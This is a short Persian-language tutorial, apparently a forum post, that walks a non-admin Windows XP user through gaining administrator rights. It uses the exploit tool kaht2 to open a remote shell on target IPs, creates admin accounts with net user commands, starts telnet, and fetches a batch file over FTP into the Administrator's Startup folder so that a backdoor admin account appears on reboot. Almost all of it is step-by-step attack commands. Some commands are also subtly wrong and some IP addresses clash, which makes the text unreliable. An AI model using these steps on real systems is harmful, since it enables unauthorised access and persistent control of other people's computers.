در اين روش به شما نشان ميدهيم که چطور مي توان با يک سطح کاربري غير admin يک کاربر جديد با سطح admin در xp ايجاد نمود:
ابتدابه قسمت start/run رفته و بنويسيد cmd سپس در محيط ايجاد شده بنويسيد ipconfig وip خود را جايي يادداشت کنيد مثلا براي من 169.254.180.70 بود.سپس در notepad يک فايل با محتواي زير ايجاد کنيد:
net user saeed 1234 /add
net user localgroup administrators saeed /add
سپس آنرا با نام مثلا saeed.bat ذخيره کنيد.حال در يک Cmd به exploit خود رفته و يک shell به صورت زير ايجاد کنيد:(در اينجا من از kaht2 که يک نرم افزار exploitمي باشد استفاده کرده ام)
D:\exploit>kaht2 169.254.80.30 169.254.80.40
دقت شود که ip ايجاد شدخ در کلاس ip خودتان باشد.
حالا shell ايجاد ميشود. در اينجا يک کاربر بصورت زير ايجاد کنيد:
c :\windows\system32>net user smart 1234 /add
c:\windows\system32>net user localgroup administrators smart /add
حالا سيستم telnet را با دستورا ت زير راه مي اندازيم:
c:\windows\system32> net start telnet
حالا يک cmd جديد باز کنيد و بنويسيد telnet 169.254.80.39 و enter کنيد. حالا به سوال جواب yes بدهيد.و در login بنويسيد smart با رمز 1234
سپس دستور زير را تايپ کنيد:
D:\>cd document and setting\administrator\start menu\programs\startup
به اين شاخه که رفتيد بنويسيد ftp و enter کنيد حالا تايپ کنيد :
ftp>open 169.254.180.70
البته شما ip خودتان را که اول گرفته را بزنيدوuser و password کاربري خودتان را که سطح admin نيز ندارد بزنيد. سپس با دستور ls ميتوانيد ببينيد که فايل saeed وجود دارد. سپس تايپ کنيد:
ftp>get saeed.bat
حالا تايپ کنيد:
ftp>close
ftp>bye
حالا اگر کامپيوتر خاموش وروشن شود يک کاربر جديد با نام saeed که سطح admin دارد ايجاد شده است.
|